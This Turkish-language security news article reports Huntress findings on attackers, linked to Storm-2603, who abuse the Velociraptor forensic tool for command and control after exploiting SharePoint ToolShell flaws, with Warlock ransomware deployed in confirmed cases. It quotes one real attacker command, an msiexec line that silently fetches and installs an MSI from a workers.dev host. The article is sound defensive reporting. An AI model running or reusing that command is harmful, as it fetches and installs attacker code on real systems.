Meşru yönetim araçları, normal ağ faaliyetlerine uyum sağlamayı amaçlayan karmaşık tehdit aktörlerinin giderek daha fazla tercih ettiği silah haline geliyor.
Yakın zamanda yapılan bir kampanya, saldırganların geniş çapta saygı duyulan bir Dijital Adli Tıp ve Olay Müdahale (DFIR) aracı olan Velociraptor’u silah haline getirdiği bu tehlikeli eğilimin altını çizdi.
Saldırganlar, bu yazılımı kullanarak gizli Komuta ve Kontrol (C2) kanallarını etkili bir şekilde kurarak, geleneksel güvenlik alarmlarını tetiklemeden keyfi komutları yürütmelerine ve güvenliği ihlal edilmiş ortamlara kalıcı erişim sağlamalarına olanak tanır.
2025’in sonlarında gözlemlenen saldırılar, yaygın olarak kullanılan kurumsal altyapıdaki kritik güvenlik açıklarından yararlanıyor ve özellikle Windows Server Update Services’ı (WSUS) ve Microsoft SharePoint’i hedefliyor.
İçeri girdikten sonra oyuncular, yanal hareketi kolaylaştırmak için Velociraptor’u kullanıyor ve onaylanan vakalarda Warlock fidye yazılımını dağıtıyor.
Bu ikili kullanım stratejisi, adli araçların varlığı genellikle aktif uzlaşma yerine iyileştirme sinyali verdiğinden, tespit etmeyi zorlaştırır.
Huntress güvenlik analistleri, Eylül ve Kasım ayları arasındaki üç farklı olayı araştırdıktan sonra bu gelişen ticari aracı tespit etti.
Araştırmaları, DESKTOP-C1N9M ana bilgisayar adı gibi belirli göstergeleri finansal amaçlı tehdit kümesi Storm-2603 ile ilişkilendirdi.
Saldırganlar, uç nokta savunmalarını atlamak ve ağ engelleme listelerinden kaçmak için Cloudflare tünellerini ve dijital olarak imzalanmış ikili dosyaları kullanarak yüksek düzeyde operasyonel güvenlik sergilediler.
Gizli Erişim için SharePoint’ten Yararlanma
Bulaşma zinciri, Microsoft SharePoint’teki “ToolShell” güvenlik açığı zincirinin istismar edilmesini belirgin bir şekilde ön plana çıkarıyor.
Saldırganlar öncelikle /_layouts/15/ToolPane.aspx adresine özel hazırlanmış HTTP POST istekleri göndererek CVE-2025-49706’yı kullanarak kimlik doğrulamayı atlar. Bunu takiben, start.aspx gibi varsayılan dosyaları kötü amaçlı web kabuklarına dönüştürmek için ikincil bir uzaktan kod yürütme güvenlik açığını (CVE-2025-49704) zincirliyorlar.
.webp)
Bu, /_layouts/15/ dizinindeki bu yetkisiz istekleri açığa çıkaran şüpheli IIS günlüklerini göstermektedir.
Web kabuğu etkinleştiğinde, tehdit aktörleri Velociraptor’u Windows Installer aracılığıyla indirip yüklemek için komutları çalıştırır. Bu saldırılarda gözlemlenen tipik komut şudur:
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
Bu kurulum, Velociraptor’u bir sistem hizmeti olarak kaydederek yeniden başlatmalarda kalıcılığı sağlar. Bunun yanı sıra Otomatik Çalıştırma, bu otomatik çalıştırma hizmetinin oluşturulmasını da gösterir.
.webp)
Saldırganlar, konumlarını daha da sağlamlaştırmak amacıyla, Base64 kodlu PowerShell komutlarını çalıştırmak için ele geçirilen Velociraptor örneğini kullanıyor.
Bu komut dosyaları, giden tüneller oluşturmak için Visual Studio Code’u (code.exe) indirir ve yasal geliştirme etkinliği içindeki kötü amaçlı trafiği etkili bir şekilde maskeler.
.webp)
VS Code günlükleri, bu tünel oluşturma süreci sırasında meydana gelen olayları vurgulayarak, aktörlerin adli araçların kötüye kullanılmasından ağ hakimiyetine nasıl geçiş yaptığını gösteriyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
